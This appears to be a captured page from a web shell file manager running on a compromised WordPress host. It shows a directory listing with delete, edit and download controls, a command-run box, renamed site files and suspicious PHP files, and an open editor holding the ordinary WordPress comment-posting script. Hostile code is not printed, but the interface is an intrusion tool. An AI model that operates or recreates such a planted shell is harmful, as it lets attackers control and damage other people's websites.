/
home
/
alixis5
/
public_html
/
/home/alixis5/public_html
mkdir
upload
Name
Size
Mode
Actions
.smc_g1__1d7c471/
-
0755
rm
.smc_g2__1d7c471/
-
0755
rm
.smc_g3__1d7c471/
-
0755
rm
.smc_g4__1d7c471/
-
0755
rm
.smc_g5__1d7c471/
-
0755
rm
.smc_g6__1d7c471/
-
0755
rm
.smc_g7__1d7c471/
-
0755
rm
.smc_g8__1d7c471/
-
0755
rm
.smc_g9__1d7c471/
-
0755
rm
.smc_g10__1d7c471/
-
0755
rm
.well-known__1d7c471/
-
0755
rm
5cfe7ca2/
-
0755
rm
cgi-bin__1d7c471/
-
0755
rm
wp-admin__1d7c471/
-
0755
rm
wp-content__1d7c471/
-
0755
rm
wp-includes__1d7c471/
-
0755
rm
.htaccess
498
0644
edit
dl
rm
.smc_guardian_v5.json__1d7c471
69
0644
edit
dl
rm
.smc_links_v5.json__1d7c471
6608
0644
edit
dl
rm
.smc_v5_config.json__1d7c471
1104
0644
edit
dl
rm
.smc_v5_nonces.json__1d7c471
106
0644
edit
dl
rm
404.shtml__1d7c471
251
0644
edit
dl
rm
default.htm__1d7c471
3937
0644
edit
dl
rm
favicon.ico__1d7c471
4286
0644
edit
dl
rm
index.php
2713
0644
edit
dl
rm
index.php__1d7c471
2713
0644
edit
dl
rm
license.txt__1d7c471
19903
0644
edit
dl
rm
logo-imh.svg__1d7c471
10869
0644
edit
dl
rm
mmtcd.png__1d7c471
719260
0644
edit
dl
rm
nauzugxg.php__1d7c471
7317
0644
edit
dl
rm
php.ini__1d7c471
106
0644
edit
dl
rm
phpinfo.php__1d7c471
21
0644
edit
dl
rm
readme.html__1d7c471
7407
0644
edit
dl
rm
readme.php.bak.v5.7.8.1788298363__1d7c471
105943
0644
edit
dl
rm
readme.php.bak.v5.7.8.1788375814__1d7c471
105943
0644
edit
dl
rm
readme.php__1d7c471
105943
0644
edit
dl
rm
robots.txt__1d7c471
31
0644
edit
dl
rm
under_construction.html__1d7c471
4871
0644
edit
dl
rm
wp-activate.php__1d7c471
7718
0644
edit
dl
rm
wp-blog-header.php__1d7c471
351
0755
edit
dl
rm
wp-comments-post.php__1d7c471
2323
0644
edit
dl
rm
wp-config-sample.php__1d7c471
3339
0644
edit
dl
rm
wp-config.php__1d7c471
3196
0600
edit
dl
rm
wp-cron-zsri.php
1659
0644
edit
dl
rm
wp-cron-zsri.php__1d7c471
1659
0644
edit
dl
rm
wp-cron.php__1d7c471
5617
0644
edit
dl
rm
wp-links-opml.php__1d7c471
2493
0644
edit
dl
rm
wp-load.php__1d7c471
3937
0644
edit
dl
rm
wp-login.php__1d7c471
52536
0644
edit
dl
rm
wp-mail.php__1d7c471
8727
0644
edit
dl
rm
wp-settings.php__1d7c471
33152
0644
edit
dl
rm
wp-signup.php__1d7c471
35081
0644
edit
dl
rm
wp-trackback.php__1d7c471
5396
0644
edit
dl
rm
xmlrpc.php__1d7c471
3205
0644
edit
dl
rm
Edit:
/home/alixis5/public_html/wp-comments-post.php__1d7c471
(2323B)
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } header( 'Allow: POST' ); header( "$protocol 405 Method Not Allowed" ); header( 'Content-Type: text/plain' ); exit; } /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = (int) $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( '<p>' . $comment->get_error_message() . '</p>', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
Save
cmd:
run